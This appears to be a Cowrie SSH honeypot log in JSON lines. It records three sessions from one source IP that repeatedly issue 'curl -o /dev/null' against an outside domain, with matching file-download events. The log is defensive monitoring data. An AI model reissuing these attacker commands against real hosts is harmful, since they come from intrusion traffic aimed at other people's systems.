{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.058006Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.059072Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.059554Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.066017Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.066748Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.068453Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.069138Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.098819Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.100402Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.101293Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.104955Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.108156Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.108773Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.112653Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.140203Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.140902Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.146478Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.147760Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.148693Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.181657Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.183912Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.184883Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.190139Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.190861Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.218620Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.219398Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.222835Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.223935Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.227652Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.228751Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.229892Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.233130Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.236851Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.239530Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.264767Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.266906Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.269380Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.270443Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.271120Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.273436Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.273999Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.278744Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.279226Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.309940Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.312096Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.313852Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.314480Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.316867Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.317280Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.319801Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.320364Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.323928Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.354578Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.356748Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.359971Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.361490Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.362100Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.366331Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.367874Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.369805Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.370278Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.403046Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.405272Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.408556Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.409304Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.411394Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.412089Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.414475Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.415009Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.419226Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.452587Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.455597Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.457620Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.458858Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.463346Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.465050Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.469242Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.471381Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.472078Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.501025Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
